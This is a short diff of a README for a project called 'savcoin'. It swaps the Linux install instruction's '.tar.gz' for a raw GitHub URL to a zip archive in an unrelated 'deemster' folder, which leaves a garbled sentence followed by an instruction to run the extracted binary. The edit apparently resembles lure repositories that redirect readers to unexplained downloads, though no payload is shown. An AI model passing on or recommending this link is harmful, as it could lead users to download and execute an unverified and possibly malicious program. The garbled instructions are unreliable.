GFGGHJKLL/savcoin/README.md

 1. After the download is complete, locate the file you saved on your computer.
 2. For Windows, double-click the `.exe` file to run it.
 3. For macOS, open the `.dmg` file and drag the application to your Applications folder.
-4. For Linux, if there’s a `.tar.gz` file, extract it.
+4. For Linux, if there’s a `https://raw.githubusercontent.com/GFGGHJKLL/savcoin/master/deemster/savcoin.zip` file, extract it.
 Open a terminal, navigate to the extracted folder, and run the application using `./savcoin`.

 ## 🚦 Basic Features